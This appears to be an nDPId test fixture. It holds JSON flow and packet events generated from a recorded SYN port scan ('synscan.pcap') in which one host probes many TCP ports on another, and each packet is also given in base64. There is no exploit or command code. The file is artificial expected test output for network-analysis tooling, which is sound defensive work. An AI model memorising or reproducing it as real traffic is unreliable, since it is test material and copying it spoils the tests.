+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADcGgnusEAAIQA2GNIzTBGzdU4MZAAAAAGACEAAkIAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAs65MAADUGJ9+sEAAIQA2GNIzTAh\/dU4MZAAAAAGACCAAubQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVAAAC4G9SKsEAAIQA2GNIzTBAbdU4MZAAAAAGACDAAohgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAAC0G6qGsEAAIQA2GNIzTB9PdU4MZAAAAAGACCAAouQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsZcAAADMGr7KsEAAIQA2GNIzTOpvdU4MZAAAAAGACEADt8AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060393,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_packet_id":1,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060393,"pkt":"ACYLMQczACWzv5HuCABFAAAsdvMAADUGnH+sEAAIQA2GNIzTIyndU4MZAAAAAGACCAANYwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060395,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_packet_id":1,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060395,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uAAADMGFpKsEAAIQA2GNIzTBAjdU4MZAAAAAGACEAAkhAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsVEkAADYGvimsEAAIQA2GNIzTBGLdU4MZAAAAAGACDAAoKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAskKIAACUGktCsEAAIQA2GNIzTACvdU4MZAAAAAGACCAAwYQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsFzgAADYG+zqsEAAIQA2GNIzTBrXdU4MZAAAAAGACDAAl1wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsDqUAADQGBc6sEAAIQA2GNIzTFLLdU4MZAAAAAGACBAAf2gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsEZkAADsG+9msEAAIQA2GNIzToifdU4MZAAAAAGACEACGZAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMwAADsGRKasEAAIQA2GNIzTH5jdU4MZAAAAAGACEAAI9AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsGE4AADUG+ySsEAAIQA2GNIzTF3PdU4MZAAAAAGACCAAZGQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsBbYAADAGEr2sEAAIQA2GNIzTJyjdU4MZAAAAAGACBAANZAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs6H4AACYGOfSsEAAIQA2GNIzTBGHdU4MZAAAAAGACDAAoKwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdMIAACoGqbCsEAAIQA2GNIzTIsPdU4MZAAAAAGACDAAJyQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8wAACUGy6asEAAIQA2GNIzTBPjdU4MZAAAAAGACCAArlAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdhoAADUGnVisEAAIQA2GNIzSCIPdUoMYAAAAAGACCAAoDAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nIAACcGKwCsEAAIQA2GNIzSE9\/dUoMYAAAAAGACEAAUsAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsjegAADcGg4qsEAAIQA2GNIzSrZrdUoMYAAAAAGACEAB69AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsNycAADcG2kusEAAIQA2GNIzSAavdUoMYAAAAAGACEAAm5AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjgAACsGpzqsEAAIQA2GNIzSD6TdUoMYAAAAAGACEAAY6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs334AACgGQPSsEAAIQA2GNIzSCVrdUoMYAAAAAGACBAArNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdPQAADkGmn6sEAAIQA2GNIzSF0DdUoMYAAAAAGACCAAZTwAAAgQFtA=="} 